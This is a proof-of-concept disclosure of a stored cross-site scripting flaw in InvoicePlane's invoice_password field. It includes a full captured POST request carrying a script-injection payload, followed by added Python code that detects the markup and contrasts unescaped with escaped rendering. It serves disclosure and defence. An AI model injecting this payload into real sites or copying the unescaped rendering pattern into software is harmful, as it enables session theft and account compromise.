POC:
A stored cross-site scripting (XSS) vulnerability was discovered in the InvoicePlane application,
versions v1.5.0 to v1.5.9 (https://github.com/InvoicePlane/InvoicePlane).
After logging into the InvoicePlane application, browse to the "View Invoices" option
available at https://demo.invoiceplane.com/index.php/invoices/status/all and select any invoice
(for demonstration, https://demo.invoiceplane.com/index.php/invoices/view/27). On this invoice page,
inject a JavaScript payload into the "PDF password" input field.
The injected JS payload is sent to the server as POST parameter data in the "invoice_password" field.
Below is the POST request InvoicePlane sends, which triggers the stored XSS (the invoice_password parameter is the vulnerable one):
POST /index.php/invoices/ajax/save HTTP/1.1
Host: demo.invoiceplane.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demo.invoiceplane.com/index.php/invoices/view/32
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 786
Cookie: ip_csrf_cookie=e6daab2293247ef975dc1e2bf621716e; ip_session=ki8khmtnpv7t3jkcj0q6dvsjm46oa6va
Connection: close

invoice_id=32&
invoice_number=INV-19-0032&
invoice_date_created=01%2F30%2F2019&
invoice_date_due=03%2F01%2F2019&
invoice_status_id=1&
invoice_password=tester"><script>alert("StoredXSS")</script>&
items=%5B%7B%22invoice_id%22%3A%2232%22%2C%22item_id%22%3A%22%22%2C%22item_product_id%22%3A%22%22%2C%22item_task_id%22%3A%22%22%2C%22item_name%22%3A%22%22%2C%22item_quantity%22%3A%22%22%2C%22item_price%22%3A%22%22%2C%22item_discount_amount%22%3A%22%22%2C%22item_tax_rate_id%22%3A%220%22%2C%22item_description%22%3A%22%22%2C%22item_product_unit_id%22%3A%220%22%2C%22item_order%22%3A1%7D%5D&
invoice_discount_amount=&
invoice_discount_percent=&
invoice_terms=&
custom%5B0%5D%5Bname%5D=custom%5B3%5D&
custom%5B0%5D%5Bvalue%5D=&
payment_method=0&
_ip_csrf=e6daab2293247ef975dc1e2bf621716e
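The defensive side of the issue above, as an added example that is not InvoicePlane's own code: it decodes a form body of the same shape as the request, flags the invoice_password value when it carries markup (a heuristic fit for a proxy or log rule on the /invoices/ajax/save endpoint), and contrasts the raw-interpolation defect pattern with HTML-escaped output. The field layout and the `render_*` helpers are assumptions for illustration, not the project's templates.

```python
"""Added example (not InvoicePlane code): detection and mitigation for the
stored XSS in the invoice_password field described above."""
import html
import re
from urllib.parse import parse_qs

# Constructed request body mirroring the write-up's POST (most fields omitted);
# the payload is left unencoded exactly as it appears in the write-up.
SAMPLE_BODY = (
    "invoice_id=32&invoice_number=INV-19-0032&invoice_status_id=1"
    '&invoice_password=tester"><script>alert("StoredXSS")</script>'
    "&_ip_csrf=e6daab2293247ef975dc1e2bf621716e"
)

# Heuristic markers of HTML/JS injection in a value that should be an opaque
# password string: a tag opener, an attribute-quote breakout, an on* handler
# or a javascript: URL. A production rule would be broader; this is illustrative.
_MARKUP = re.compile(r"""<\s*/?[a-z!]|["']\s*>|\bon\w+\s*=|javascript:""", re.I)


def parse_form_body(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into {name: first value}."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def flag_request(body: str, watched=("invoice_password",)) -> list:
    """Return the watched field names whose decoded value looks like markup.
    Intended for an access-log or reverse-proxy check on
    POST /index.php/invoices/ajax/save."""
    params = parse_form_body(body)
    return [f for f in watched if _MARKUP.search(params.get(f, ""))]


def render_unsafe(value: str) -> str:
    """The defect pattern: raw interpolation into an attribute (do not use)."""
    return f'<input type="text" name="invoice_password" value="{value}">'


def render_safe(value: str) -> str:
    """Mitigation: HTML-escape on output so a quote cannot close the attribute
    and angle brackets cannot open a tag."""
    return (
        '<input type="text" name="invoice_password" value="'
        + html.escape(value, quote=True)
        + '">'
    )
```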